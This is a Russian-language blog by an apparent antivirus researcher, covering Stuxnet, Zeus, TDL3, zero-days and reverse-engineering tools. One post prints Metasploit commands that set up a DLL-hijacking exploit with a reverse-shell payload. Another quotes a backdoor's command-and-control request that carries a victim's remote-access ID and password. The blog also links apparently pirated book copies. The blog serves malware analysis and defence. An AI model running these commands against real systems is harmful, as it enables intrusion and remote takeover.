2011-02-11T17:32:00.003+03:00

Тут стало популярным мнение о том, что зевс (Win32/Spy.Zbot) практически загнулся. Но на самом деле он еще долго будет барахтаться в предсмертных конвульсиях и приносить не которым неплохие деньги. Более того, процент участия вредоносных программ из этого семейства в инцидентах связанных с ДБО, тоже достаточно высок. Так, что похороны были как минимум преждевременными.

Бот билдер с админкой старых версей не раз утекал в свободный доступ, а появление SpyEye конечно снизило число предложений о продаже зевса, но они по прежнему есть. Так вот тут буквально вчера MS показала интересную статистику:

Дальше »

Снова засветился на НТВ

2011-02-08T20:18:00.001+03:00

Сегодня исполнился ровно год с того момента, как в России появился центр вирусных исследовании и аналитики у компании ESET. И поэтому поводу о нас решили снять сюжет на НТВ и пустить его в прайм-тайм :) (это шутка и конечно было все не так, но поздравления в комменты все равно принимаются по поводу ДР центра =))

Эволюция client-side эксплойтов в картинках

2011-02-04T12:43:00.002+03:00

Как же просто все было в году эдак в 2004:

И как же все усложнилось сейчас:

Обе картинки потырены наглым образом из презентации:
Dino A. Dai Zovi
"Memory Corruption, Exploitation, and You" (слайды)

Концепт мобильного ботнета управляемого по SMS

2011-01-31T16:45:00.002+03:00

На конференции Shmoocon'2011 был представлен интересный подход к построению мобильного ботнета с возможностью управления через SMS на телефонах на базе Android.

Слайды презентации

Видео с демонстрацией работы:

Уязвимость в обработке MHTML протокола (CVE-2011-0096)

2011-01-29T16:40:00.003+03:00

Около двух недель назад появилась интересная информация "Hacking with mhtml protocol handler". Как оказалось очередной 0-дей в обработке MHTML, на этот раз уязвимость кроется в обработке MIME-formatted запросов. При определенных условиях злоумышленник может внедрить js-код, который выполниться на клиентской стороне. Последствия могут быть разные, например похищение аутентификационных данных для популярных сервисов или банальный XSS. Работает уязвимость только на IE, но зато для всех версий и видне начиная с ХР и выше.

Дальше »

Win32/Sheldor - теперь малиновый ...

2011-01-24T20:46:00.000+03:00

Недавно уже писал про семейство Win32/Sheldor и вот на днях граждане порадовали другой версией Win32/Sheldor.E (VT) с двумя интересными командами:

Дальше »

Атака на антивирусные облака

2011-01-21T13:11:00.003+03:00

На днях у себя в блоге MS опубликовала заметку о китайском троянце, который использует техники противодействия облачным антивирусным технологиям. С точки зрения приманки для журналистов все сработало, ибо заявление достаточно интересное, но на самом деле сей троянец достаточно прост и никаких инноваций в себе не несет.

Итак, способы противодействия облакам:
- при установке в файлы добавляются блоки случайного разного размера содержащие случайные данные, видимо для того, чтобы хешики сбивать.

Дальше »

Эксплойт для MS10-073 таки попал на паблик

2011-01-19T00:30:00.001+03:00

Сегодня на Metasploit появился эксплойт для повышения привилегий до SYSTEM, через эксплуатацию уязвимости в неправильной обработки keyboard layout (win32k.sys). MS10-073 известен тем, что применялся червем Stuxnet для повышения привилегий на системах Win2000/WinXP и уже много где достаточно подробно разобран (анализ от vupen).

В Canvas эксплойт для этой уязвимости попал примерно за месяц до выхода патча, но публичного эксплойта так никто и не сочинил. Возможно по причине того, что эксплойт не универсален и работает только на Win2000/WinXP. Появление этого эксплойта в Metasploit связано с PoC, который разработал Ruben Santamarta aka reversemode и положил на паблик на прошлой неделе.

А вот уязвимость с переполнением стека при обработке SystemDefaultEUDCFont (CVE-2010-4398) по прежнему не закрыта, а ведь прошло у больше двух месяцев.

Чтиво для вирусного аналитика

2011-01-17T16:10:00.002+03:00

Как то я уже писал о книге Malware Analyst's Cookbook Если кому надо, то вот:
http://depositfiles.com/files/3tgmhz81h
А здесь все исходные тексты из книги: http://code.google.com/p/malwarecookbook

Еще недавно приобрел неплохую книжицу "A Guide to Kernel Exploitation: Attacking the Core", но в интернетах водится ее электронная версия:
http://depositfiles.com/files/a5v5r0xkh

TeamViewer, как компонент бэкдора

2011-01-15T00:36:00.003+03:00

Тут на днях коллегам из Group-IB попался интересный сэмпл, конечно он не просто так им попался и посредством него увели кругленькую сумму :) Собственно интересен он только тем, что дропер устанавливает в систему TeamViewer предыдущей версии с одной модифицированной библиотекой, через которую и происходит общение с админкой.

GET /getinfo.php?id=414%20034%20883&pwd=6655&stat=1 HTTP/1.1

User-Agent: x3

Host: goeiuyi.net

Во всем остальном интересного там ничего нет и все более чем стандартно. Детектим мы его, как Win32/Sheldor.NAD (VT).

0-day для Graphics Rendering Engine

2011-01-11T20:35:00.002+03:00

Интересный эксплойт появился на метасплойте в начале января для CVE-2010-3970. Началось все с двух товарищей Moti Joseph & Xu Hao, которые поведали миру о переполнении стека при отображении thumbnails файлов на конференции POC2010 в середине декабря (слайды).

Дальше »

На выходных пришло интересное спам сообщение ...

2010-12-20T20:48:00.001+03:00

Дальше »

Дождались или уязвимость в Task Scheduler закрыта

2010-12-15T17:40:00.003+03:00

Не прошло и нескольких месяцев, как вчера вышел MS10-092, закрывающий последний 0-day, эксплуатирующийся червем Stuxnet для повышения привилегий до уровня системы на осях Vista/Win7.
Что интересно эта уязвимость стала эксплуатироваться руткитом TDL4 с конца ноября для инсталляции на системы Vista/Win7.

Где-то в конце ноября появился публичный эксплойт и примерно через несколько дней мы обнаружили первые экземпляры TDL4, эксплуатирующие эту уязвимость. Возможно эти события никак и не взаимосвязаны, т.к. в CANVAS рабочий сплойт попал на много раньше, да и в принципе уже многие его расковыряли сами в тельце Stuxnet. Кстати уязвимость эксплуатируется достаточно просто и код получается универсальным и для x86 систем, и для x64.

Что стало наиболее приятным для меня во всей этой эпопее с сотрудничеством с MS, нас таки отметили в списке с благодарностями:

Но в принципе, иначе и быть не могло, т.к. мы единственные кто предоставили рабочий PoC код еще в сентябре, а не только описание уязвимости.

MS10-92 - это не единственная уязвимость закрытая вчера и с полном списком можно ознакомиться здесь.

Два 0-day, о которых пока молчит MS

2010-11-28T16:19:00.002+03:00

На прошлой неделе был опубликован PoC на интересный 0-day, суть которого заключается в недостаточном контроле входных параметров функции RtlQueryRegistryValues() в итоге получаем классическое переполнение стека в ядре и права SYSTEM у нас в руках. Эксплуатировать уязвимость достаточно просто,т.к. в ядре нет различных препятствий мешающих эксплуатации, как в пользовательском режиме. Не буду тут подробно описывать эту уязвимость, так как все уже есть.

Второй интересной новостью стало появление публичного PoC для уязвимости в Task Scheduler, которая была обнаружена в коде червя Stuxnet и известна уже как минимум с конца лета (с этого же времени MS тоже в курсе).

Обе эти уязвимости прекрасно работают на большинстве распространенных версий винды и позволяют повысить локальные привилегии до SYSTEM в обход UAC. Но кроме бюллетеней CERT, пока нет официальных бюллетеней со стороны MS, в прочем и дат по их закрытию тоже. А злоумышленники тем временем имеют вполне себе неплохие инструменты для "тихой" инсталляции всякого зверья.

Альтернативный GUI для Metasploit в стиле Canvas

2010-11-28T15:46:00.001+03:00

Наткнулся сегодня на интересный проект Armitage, целью которого является замена оригинального GUI для Metasploit. На первый взляд мне все понравилось, правда заметно, что при реализации Armitage позаимствован ряд идей из Immunity Canvas. Посмотрим, как дальше будет развиваться проект, но для старта вполне плохо.

Дальше »

Впечатления от поездки на AVAR'2010

2010-11-24T20:25:00.002+03:00

Началось мое путешествие вечером 14 ноября, мне предстояло совершить перелет с двумя пересадками и в общей сложности это должно было занять около 26 часов. Летел я арабскими авиалиниями Qatar, которые произвели на меня очень приятное впечатление. Выглядел мой путь следующим образом: Домодедово->Доха->Сингапур->Денпасар.

Дальше »

SCADA и Stuxnet

2010-11-13T17:54:00.000+03:00

Не так давно я уже выкладывал ролик с демонстрацией того, что делает Stuxnet при модификациях вносимых им в параметры SCADA системы. Правда он был в плохом качестве и был заснят одним из посетителей VB'2010 на мобильный телефон. Разобрать, что там происходит на самом деле было достаточно проблематично и вот наконец авторы того доклада решили обновить свою видео демонстрацию и на этот раз уже с преферансом и блудницами :)

AVAR'2010

2010-11-12T00:36:00.000+03:00

На следующей недели состоится довольно любопытное мероприятие AVAR'2010 (Association of anti Virus Asia Researchers). В этот раз конференция состоится в интересном месте, а точнее на Бали и слетать туда само по себе приятно, а тут еще и можно дополнительную пользу извлечь от поездки в виде интересных докладов.

Программа довольно насыщена, в общем я в предвкушении мероприятия. Ждите отчет а ближайшее время ;)

SpyEye все больше привлекает внимания

2010-11-10T20:03:00.000+03:00

Где-то около недели назад была опубликована интересная статистика по активности троянца SpyEye, эти материалы были опубликованы в блоге компании Damballa. Интересно, что пока лидерами по количеству активных админок являются, Украина и Чехия.

Сейчас SpyEye набирает все большую популярность, как crimeware в и определенных кругах у него есть все шансы окончательно добить Зевса, который пока еще не хочет сдаваться. С точки зрения технологий SpyEye опережает Зевса, хотя во многом функционал у двух этих семейств повторяется. Кстати не так давно начал сою работу SpyEye Tracker (пока не очень много отслеживаемых C&C), который во многом повторяет ZeuS Tracker, но авторы обещаю интересные нововведения.

Смарт-карты не панацея для ДБО

2010-11-03T17:21:00.003+03:00

Совместно с Group-IB делали один ресеч и в процессе были получены интересные результаты. Модификация Zbot полученная в процессе криминалистической экспертизы оказалась достаточно интересной, так как позволяла злоумышленнику делать удаленно запросы к смарт-карте.

Подробности в нашем корпоративном блоге ;)

Stuxnet under the microscope (revision 1.2)

2010-11-03T00:07:00.001+03:00

Сегодня обновили наше исследование "Stuxnet under the microscope" до версии 1.2, внесли немного косметических правок. Но самое главное добавили описание последней 0-day уязвимости, которая пока не была озвучена подробно, речь идет о повышении привилегий через Task Scheduler. В нашем отчете мы подробно рассмотрели то, как червь Stuxnet эксплуатирует эту уязвимость для повышения привилегий под Vista/Win7. Все использованные вектора для атаки червем Stuxnet выглядят следующем образом:

Опыт заказа книг с amazon

2010-11-02T23:54:00.000+03:00

На прошлой неделе я решил попробовать заказать твердую копию одной книжицы с amazon, ибо по тем ценам, по которым предлагают англоязычную литературу интернет-магазины рунета, ну просто не в какие ворота. Недолго думая я посмотрел на цену вместе с доставкой и обещанные сроки в 5 дней, решил таки рискнуть. В среднем книжка с доставкой в msk обходится менее двух тысяч рублей, что вполне приемлемо для такой покупки с учетом меньшего количество опечаток и идиотизмов переводчиков. К моему удивлению все было доставлено в срок, причем можно отслеживать перемещение своей посылки на сайте amazon:

С учетом полученного опыта теперь буду заказывать книжки исключительно таким образом, дабы не напрягать мои забугорных коллег.

Malware Analyst's Cookbook

2010-10-27T20:12:00.003+04:00

Интересная книжка появилась на прилавке амазона.

Вчера довелось прочесть лекцию в МГУ

2010-10-22T14:47:00.001+04:00

Вчера прочитал лекцию в стенах ВМиК МГУ в рамках цикла семинаров "Технологии разработки и анализа программ". Хотя я изначально я предупреждал организаторов, что тема моего доклада будет отличаться от тематики семинара и в основном я хотел бы поговорить о целенаправленных атаках на примере червя Stuxnet, проблемах реверсинга больших программ и о возможных сценариях развития кибервойн, но их это не остановило. На мой взгляд получилось интересно и пока меня на втором часу лекции не прервали организаторы :), я никак не мог остановится, настолько у меня накопилось много информации и мыслей по этой теме. А прервать им меня пришлось, так как семинар состоит из двух частей, первая это доклад, а вторая собственно дискуссионная часть.

Дальше »

По количеству инцидентов Java затмила Adobe

2010-10-19T00:43:00.005+04:00

Не так давно в нашей статистике я указывал на явный тренд увеличения числа инцидентов с эксплойтами для платформы Java. Сегодня MS опубликовала пост по теме, в котором делает акцент на этой же тенденции.

Все эксплуатируемые уязвимости мягко говоря с душком:

CVE-2008-5353

CVE-2009-3867

CVE-2010-0094

WTF!

Статистика активности Java-уязвимостей подтверждается и по ту сторону баррикад (скриншот позаимствован у Кербса).

Вышла наша статейка в VB magazine за октябрь

2010-10-12T15:46:00.001+04:00

В начале лета мы проводили подробное исследование последних, на тот момент, модификаций руткита TDL3. В тоже самое время мы отправили статью в VB magazine рассказывающую немного подробнее о возможностях внутренней файловой системы этого руткита. И вот наконец она опубликована в октябрьском номере "Rooting about in TDSS".
Интерес представляет не только содержимое статьи, которое я смогу опубликовать в публичный доступ только по истечении 3 месяцев:), но и утилита tfd.exe. Тулза свободно распространяется и предназначена для дампа содержимого файловой системы TDL3 для быстрого получения информации о боте.

Обновление IDA Pro до версии 6.0

2010-10-02T16:19:00.002+04:00

Вчера тихо и незаметно вышла обновленная версия наиболее часто используемой мной тулзы IDA Pro до версии 6.0. Самое большое нововведение этой версии заключается в том, что теперь мы имеем единый графический интерфейс на QT для Win/Mac/Linux платформ. И выглядит он даже удобнее прежнего + плюс еще была замечена более быстрая загрузка и скорость работы. Вот так оно выглядит на моем маке:

Дальше »

Another report about Stuxnet

2010-10-01T12:28:00.003+04:00

Сегодня Symantec наконец выпустили свой репорт о Stuxnet, не смотря на то, что мы их опередили у них раскрыта SCADA составляющая гораздо подробнее (во всем остальном наш отчет лучше :)). Поэтому всем интересующимся рекомендую к прочтению "W32.Stuxnet Dossier".
Ну, а на сладкое демонстрация последствий заражения PLC контроллера с VB'2010 ;)

Unpatched 0-day's, Stuxnet and M$

2010-09-29T20:43:00.001+04:00

Не для какого уже давно не секрет,что как только появилась информация об использовании червем Stuxnet не закрытых уязвимостей, множество исследователей по разные стороны баррикад стали их искать. Кому-то удалось их найти, а кому-то нет, но не понятно, когда они будут закрыты. Обе уязвимости используются червем для повышения локальных привилегий в системе при своей инсталляции в систему.

Дальше »

Засветился на НТВ сегодня немножко :)

2010-09-27T20:19:00.000+04:00

Не успел прийти сегодня на работу, как понабежали журналисты и начали допрашивать насчет червя Stuxnet. Говорят наш отчет даже читали :)

Stuxnet Under the Microscope

2010-09-24T20:05:00.002+04:00

Вчера вечером мы закончили подготовку достаточно серьезного исследования по анализу червя Win32/Stuxnet. Самым сложным было подготовить сам отчет, т.к. он постоянно разрастался, потому как хотелось описать все, но описать все, таки не получилось. Некоторые подробности внедрения вредоносного функционала в SCADA остались за кадром (ну нету у нас реактора для тестов :)). Также мы не стали публиковать описание еще двух 0-day уязвимостей, которые пока до сих пор не закрыты и MS попросила этого не делать. Одна из них находится в win32k.sys и служит для повышения локальных привилегий в процессе инсталляции на операционные системы Win2000/WinXP. А вторая поинтереснее, т.к. позволяет повысить привилегии на Vista/Win7, через уязвимость в Task Scheduler. Пока про эти уязвимости больше ничего не скажу, всему свое время ;)

Искренне считаю, что мы провели полезное исследование и смогли правильно преподнести его результаты, поэтому крайне рекомендую вам с ним ознакомиться.

Twitpocalypsis NOW!

2010-09-21T18:22:00.001+04:00

Много радости и веселья сегодня доставил Twitter пользователям веб-интерфейса. Дело в том, что свеженайденная XSS-уязвимость породила кучу различных веселых твитов содержащих JavaScript, который выполнялся при их просмотре :)
Например, вот такое вот безобидное на первый взгляд сообщение, может привести к интересным последствиям.

Дальше »

Опять Adobe накосячил (CVE-2010-2883)

2010-09-13T16:43:00.004+04:00

На прошлой неделе был обнародован очередной 0-day для Adobe Reader (CVE-2010-2883). На этот раз повинна оказалась CoolType.dll, которая отвечает за парсинг True Type Font. Уязвимость проявляется при обработке шрифта с неправильной SING таблицей. В функции обработки есть вызов небезопасной синшной функции strcat(), которая при определенных условиях приводит к переполнению на стеке.

Дальше »

TDL поработил x64

2010-09-01T17:24:00.003+04:00

Сегодня написал обзорную статью о новом витке развития нашумевшего руткита TDL3, который на долго поселился в головах исследователей из антивирусных компаний. TDL3 считается одним из самых передовых творений разработчиков руткитов на сегодняшний день. О нем писали очень много, одни из последних публикаций это отчет о нашем исследовании этого руткита и статья "TDSS: полное раскрытие" от eSage Lab.

Интересную статистику (по распространению всего семейства) по сабжу показала MS:

Как мы видим присутствует явное доминирование платформы WinXP и в новой версии авторы видимо решили исправить такое положение дел. Кол-во инсталляций Win7 x64 постоянно растет и теперь есть механизмы, позволяющие инсталлировать руткиты и на эту платформу.

Концепт (Disable PatchGuard & Driver signature enforcement) механизма обхода проверки подписи в x64 появился еще в начале года в публичном доступе, но авторами помимо предложенного в нем механизма используется еще вызов недокументированной функции IoCreateDriver(), которая собственно и позволяет выполнить вредоносный драйвер (про это есть немного тут).

Chaos Constructions'2010 (Outro)

2010-08-31T21:11:00.002+04:00

Провел все выходные на фестивале Chaos Constructions'2010, собственно сабж меня особенно не чем не впечатлил. Хотя в этом году совместными усилиями большого количества людей был подготовлен лучший HackQuest за всю историю и был некоторый перевес в сторону ИБ на семинарах. Но, как мне кажется часть касающуюся безопасности пора выделять в отдельное мероприятие и развивать его. Практическими все доклады делались ведущими специалистами из различных областей ИБ, которые понимали о чем говорят. Так как к подготовке HackQuest подошли очень серьезно, народ не прошел больше половины заданий. Но в ближайшее время он будет выложен в общий доступ и каждый желающий сможет попробовать свои силы.
Самой интересной частью был вечер субботы, когда удалось собрать весь интересный народ в одном кабаке и со всеми пообщаться :)

Змеиный костыль PyHiew

2010-08-26T14:11:00.000+04:00

Неожиданно несколько дней назад один из нынешних разработчиков IDA Pro - Elias Bachaalany, опубликовал интересный плагинчик для Hiew. PyHiew это полноценный HEM модуль, который позволяет вам автоматизировать различную рутину на python. Плагин распространяется с сырками и лежит здесь. Примеры работы с ним можно посмотреть непосредственно в блоге у Elias.

import hiew
hiew.Message(“Hi”, “Hello world!”)

0-day by design (Security Advisory (2269637))

2010-08-24T20:03:00.001+04:00

На прошлой неделе появилась информация о найденной новой концептуальной уязвимости позволяющий выполнить произвольную динамическую библиотеку, путем подмены ее легального экземпляра. Эта информация появилась от автора Metasploit HDmoore и он сразу приводил пример работы этой уязвимости с iTunes. Народ задергался и понял, что пахнет архитектурной брешью, правда все и так о ней знали уже хрен знает сколько времени и чего задергались все только сейчас непонятно (причем даже MS знал уже не один год об этом). Я в нашем посте на хабре достаточно подробно описал саму уязвимость и возможные пути решения проблемы, но некоторые мысли еще остались и для собственного бложика :)
В последнее время мы наблюдаем уже второй 0-day (первый, история с Lnk) с найденной архитектурной ошибкой, by design так сказать. По своей структуре обе эти уязвимости довольно похожи. Такого рода уязвимости закрываются значительно дольше, да и время жизни эксплуатации таких уязвимостей не сравнимо. Не говоря уже о том, что не нужно заморачиваться со всякими DEP и ASLR. А в данном конкретном случае уязвимыми являются достаточно большое количество приложений. Но вот действительно удивляет то, что MS сама не использует свои best practices при разработке. Уже появился PoC для Word и PowerPoint. Ну, а generic exploit в составе Metasploit вообще шикарен. Пример эксплуатации:

msf use exploit/windows/browser/webdav_dll_hijacker
msf exploit(webdav_dll_hijacker) > set EXTENSIONS "txt"
msf exploit(webdav_dll_hijacker) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(webdav_dll_hijacker) > set LPORT 6666
msf exploit(webdav_dll_hijacker) > set LHOST
msf exploit(webdav_dll_hijacker) > exploit

P.S.: Как оказалось даже существуют научные работы ("Automatic Detection of Vulnerable Dynamic Component Loadings") по поиску решения этой проблемы.

Dr.Gadget спешит на помощь

2010-08-17T18:09:00.000+04:00

Попался тут недавно на глаза довольно любопытный плагин для IDA, основной задачей которого является помощь в анализе и подготовки ROP-последовательностей.

Зовут это чудо Dr.Gadget и умеет он следующее:
- собственно загрузку ROP-последовательности в виде бинарного файла и ее редактирование (удобно при написании сплойтов).
- добавление элементов из загруженного в IDA файла (удобно для поиска и добавления rop gadgets)
- поиск последовательностей ассемблерных инструкций и добавление их

Плагин можно использовать как при статическом анализе, так и при динамическом, что собственно удобно при анализе эксплойтов использующих технику ROP.

Ну и на последок вот вам ссылка на достаточно большую коллекцию уже готовых rop gadgets от corelanc0d3r.

CrackME для СС'2010

2010-08-13T17:58:00.000+04:00

Довелось поучаствовать в разработке одного из заданий на реверсинг для HackQuest на СС'2010.

В процессе прохождения задания можно получить больше двух ключей (очки по которым оценивается успешность участника), но больше я вам ничего не скажу :)

Chaos Constructions'2010

2010-08-13T01:35:00.001+04:00

Традиционно в в конце августа проходит мероприятие под названием Chaos Constructions и в рамках него не менее традиционно проходит конкурс HackQuest. В прошлом году у меня лично сложилось не очень приятное впечатление от мероприятия в целом, но в этот раз орги ~~взялись за ум~~ подготовились более серьезно. В частности в подготовки конкурса HackQuest участвовало много разных людей и получилось достаточно много разноплановых заданий. На мой взгляд будет интересно приходите поучаствовать и пообщаться. Ну а если удастся продвинуться в прохождении HackQuest, тогда можно рассчитывать на различные материальные блага, например в виде таких вот футболок:

Помимо HackQuest уже запланировано много интересных семинаров по различным аспектам ИБ и не только. Само мероприятие будет проходить в Санкт-Петербурге и запланировано на последние выходные августа (28-29). Приходите будет интересно!

Новая багофича от MS (CVE-2010-2568) или LNKpokalipsis

2010-07-21T16:46:00.008+04:00

Буквально недавно была обнаружена уязвимость в обработке LNK-файлов и их отображением. Но самой уязвимости уделяется мало внимания, в основном весь шум вокруг Win32/Stuxnet и использованных валидных сертификатов для подписи компонентов этого зловреда. А тем временем эта уязвимость уже появилась в публичном доступе. Сначала в виде PoC, а потом и в виде модуля для Metasploit. MS, как в прочем и обычно, пофиг на критичность этой уязвимости и она вероятнее всего выпустит патч не раньше 10 августа. А для WinXP SP2 патча вообще не будет, хотя как не странно на ней еще есть пользователи и их не так мало, как хотелось бы. Подтверждение тому распределение угрозы по оконным версиям от Symantec, где именно WinXP SP2 имеет большую долю зафиксированных инцидентов.

В качестве векторов использования этой уязвимости могут быть не только USB-накопитили, но и сетевые ресурсы. Например, в Metasploit эксплуатация происходит через WebDAV. Работает уязвимость примерно так:

Речь идет не о банальном переполеннии или неразименованном указателе, все гораздо хуже, т.к. уязвимость by design так сказать (уязвимы все версии винды). Т.е. разработчики прохлопали ушами, что такой путь могут использовать злоумышленники для установки всякого вредоносного. Хотя может все гораздо хуже и это просто очередной бэкдор оставленный в системе по просьбе NSA? Боюсь правды мы не узнаем никогда. Давайте теперь поговорим непосредственно о технических деталях работы этой уязвимости.
CVE-2010-2568 – уязвимость находится в обработчике LNK-файлов, о точнее связана с процессом отображения Control Panel shortcuts, когда происходит их загрузка в память процессом Explorer.exe. Уязвимой являться библиотека shell32.dll в которой происходит некорректная обработка. Ниже приведенная схема иллюстрирует потоки данных между вызываемыми функциями в процессе работы эксплойта (подсмотренно здесь). Успешным выполнением эксплойта является загрузка сторонней динамической библиотеки при помощи WinAPI функции LoadLibraryW.

Собственно именно ниже приведенный код и заставляет выполниться вредоносную DLL, этот код находиться в функции _LoadCPLModule, которыя вызывается из CPL_LoadCPLModule.

В эксплойте в составе Metasploit для эксплуатации уязвимости генерируется URL следующего вида "{webdav}{exploit_base}\\{exploit_dll}", такой подход к эксплуатации этой уязвимости сильно расширяет границы ее использования за пределы USB-накопителей.

Top-10 наиболее уязвимых вендоров ПО

2010-07-12T18:42:00.000+04:00

Интересный отчет обнародовала Secunia, в котором приводится срез самых крупных вендоров ПО по числу найденных уязвимостей. Интересный факт, что в этом году по числу найденных уязвимостей лидирует компания Apple, которая пришла на смену прошлогоднему лидеру Oracle. По графику можно отследить явный тренд увеличения числа найденных уязвимостей, видимо с ростом популярности эта платформа привлекает к себе все больше внимания со стороны исследователей по всему миру.

Судя по графику у MS стагнация начиная с 2006 года, т.е. уязвимости находят регулярно и много. А вот Adobe, как ни странно находиться только на пятом месте.

IDA + Bochs: нафига оно надо?

2010-07-12T16:27:00.001+04:00

Я как-то уже писал об эмуляторе x86emu для IDA, но сегодня я хочу рассказать о гораздо более мощном эмуляторе Bochs. Bochs представляет собой полный эмулятор системы, на базе которого вы можете загрузить любую ОС (если только нужное для загрузки этой ОС железо поддерживается эмулятором).

В эмуляторе есть встроенный отладчик, который позволяет отлаживать загрузку операционной системы еще на раннем этапе. Но самое интересное другое, а точнее то, что начиная с версии IDA Pro 5.4 появилась возможность подключаться к отладчику Bochs из стандартного интерфейса IDA. Работает эта связка достаточно быстро, в отличии, если вы попытаетесь загрузить винду под эмулятором и выполнить какие-то осмысленные действия. А том, как подключить отладчик Bochs из IDA уже есть хороший мануал, а я постараюсь рассказать собственно зачем это делать. На самом деле эту возможность почему то многие упускают из виду, хотя порой эта фича оказывается крайне полезной. Например, при отладке шелл-кода, обфусцированного кода или когда просто нужно быстро выполнить произвольный участок исполняемого файла. IDA поддерживает несколько режимов отладки в связке с Bochs:
- отладка ранней стадии загрузки (Disk Image), что позволяет отлаживать boot record
- отладка произвольного участка кода (IDB), позволяет выполнить на эмуляторе любой выделенный участок кода. Этот режим полезен при отладке шелл-кода и обфусцтрованных участков кода
- отладка исполняемого файла (PE), стандартный режим отладки

Отладка загрузочной записи бывает очень полезна при анализе зловредов, которые ее модифицируют (mebroot, gootkit ...).

Использование связки IDA + Bochs значительно эффективнее, нежели x86emu, т.к. здесь происходит эмуляция не выборочного набора вызовов API, а работы всей ОС целиком.

Обновление IDA и Hex-Rays

2010-07-05T16:17:00.000+04:00

Как-то неожиданно обновились на прошлой неделе сразу и IDA до версии 5.7, и Hex-Rays до версии 1.3 (еще обновился ARM Decompiler, но я его пока не использовал почти, только из любопытства немного покрутил). Hex-Rays, причем уже обновлялся относительно недавно до версии 1.2, где одним из главных нововведений была поддержка декомпиляции операций с плавающей точкой. Этот релиз больше похож на большой bugfix, где поправили много всяких недочетов и навели немного гламура на внешний вид декомпилированного листинга. Все гламурные рюшки версии 1.3 можно увидеть на сomparison Page. А changelog с багфиксами здесь.
Из важных нововведений для IDA, наконец-то сделали поддержку MMX/XMM регистров во строенном отладчике. Появилась возможность подгрузить отладочные символы и автоматически делать анализ кода для выбранного модуля в процессе отладки. Сильно обновился IDAPython до версии 1.4, там случился тоже большой багфикс и улучшалась скорость работы. А самое главное, теперь появилась нормальная дока по всем методам и классам поддерживаемым в IDAPython. Полный changelog здесь. Я уже давно перешел на использование IDAPython, ибо меньше времени и удобнее нежели IDC, думаю, что дальше развивать IDC нет смысла.
Еще интересно, что началось тестирование нового интерфейса написанного на QT и дающего возможность нормального GUI под все поддерживаемые платформы. Наконец-то у меня будет нормальная IDA на моем маке и без использования ВМ, а не это консольное убожество.
В этом году вообще чувствуется активная разработка и желание улучшить свои продукты со стороны разработчиков IDA, а ведь такими темпами и 6.0 не за горами. Интересно, когда они начнут нам анонсировать вкусности шестерки :)

CVE-2010-1885 в цифрах

2010-07-01T15:04:00.003+04:00

Интересную аналитику выкатила MS сегодня у себя в блоге.
Предыстория такова, что 10 июня небезызвестный гуглоинженер Tavis Ormandy aka taviso обнародовал уязвимость в механизме проверки обращений (hcp://) к Microsoft Windows Help Centre. Собственно он не просто обнародовал уязвимость, но и открыл исходный код эксплойта. MS жаловалась на этого товарища, что он мало им дал времени для закрытия уязвимости и вообще зря затеял выкладывать такое на паблик, но обсуждать здесь сторону морали мне совсем не хочется.
Так вот MS сегодня обнародовала цифры по количеству зафиксированных ими атак с использованием этой уязвимости, и они получились очень забавные:

Так как уязвимость нацелена на пользователей Windows XP, то соответственно под ударом оказались по большей части регионы в которых процент пользователей этой операционки высокий. Мы на втором месте после Португалии, забавно :)
Интересно также посмотреть и на динамику роста количества атак с использованием этого сплойта:

Видно, что спустя уже несколько дней после публичного раскрытия уязвимости вместе с сорцами сплойта, начались целенаправленные атаки на эту уязвимость. Без публикации готового эксплойта, это временное окно немного больше, точнее процент числа атак растет не так быстро.

Update:
Финальная версия статистики от MS перед выпуском патча.

Win32/Olmarik или исследование TDL3 в деталях

2010-06-28T13:07:00.001+04:00

Мы тут на днях закончили подготовку материалов нашего исследования: "Руткит Win32/Olmarik: технологии работы и распространения". Расковыряли мы все достаточно глубоко и подробно, поэтому в отчете присутствует информация, которой раньше я не встречал на паблике (тем более на русском языке).

Heap Spraying Attack Detection with Nozzle (MS Research project)

2010-06-23T14:50:00.000+04:00

Adobe ≠ безопасность или "долгоиграющий" 0-day

2010-06-19T00:27:00.000+04:00

На протяжении всего текущего года компания Adobe уже не раз нас радовала серьезными уязвимостями, которые влекли за собой возможность удаленного выполнения произвольного кода. В этот раз очередной "шедевр" (CVE-2010-1297) был связан с уязвимостью в Adobe Reader и некоторыми особенностями обработки встроенных в pdf флеш-роликов. Многие уязвимости в продуктах Adobe (CVE-2010-129 входит в их число) могут эксплуатироваться не только на платформе windows, но на многих других, на которые они официально подставляются. Другое дело, что провести успешную атаку эксплойтом на одних плотформах проще, а на других сложнее. Сама Adobe не спешит выпускать заплатку для этой уязвимости и она запланирована только на конец июня, получается, что пользователи продукции этой компании подвержены риску почти на протяжении целого месяца. На мой взгляд для столь массовых продуктов это просто не допустимо. Ну, а теперь давайте рассмотрим саму уязвимость.
Итак, уязвимость находиться в модуле authplay.dll, при обработке специально сформированного SWF. Корнем зла на этот раз оказался тег DoABC, использующийся при вставке swf в pdf-файлы. Во вредоносном SWF-файле заменен всего лишь один опкод, но именно он и приводит к ошибке. Оригинальный байт-код 0x66 (GetProperty) заменен на 0x40 (newfunction).

Судя по всему уязвимость была найдена с применением методов фаззинга файловых форматов.
Но выполнению SWF предшествует heap-spraying, используется для обхода DEP.

В итоге мы получаем ret2lib в BIB.DLL, после чего начинается выполнение шелл-кода. Подобная техника обхода DEP была использована в нашумевшей атаке codname: Aurora. Сейчас она приминяется очень часто в различных эксплойтах.

Для того чтобы попасть в библиотеку BIB.dll используются техники return-oriented programming (ROP), недостаток этого метода в достаточно длительном времени работы. Например, публичный эксплойт на CVE-2010-1297, опубликованный в рамках Metasploit. Оказался очень медленным и нестабильным в работе.
На днях была опубликована программа BH'2010 USA та, что проводиться в Вегасе и на ней было замечено достаточно большое количество докладов посвященных ROP. Конец лета будет интересным :)

Напоследок небольшая демка, которую я записал для корпоративного блога, но мне она нравится и пожалуй продублирую ее здесь тоже :) На ней отчетливо видно, как не быстро отрабатывает ROP shellcode (из Metasploit'а работает как минимум в двое медленее). В качестве сандтрека была взята заглавная тема к фильму Pi.

Материал по теме:
Подробное исследование от Zynamics
Исследование от Symantec
Исследование от Websense

CARO'2010: Итоги

2010-05-29T17:49:00.001+04:00

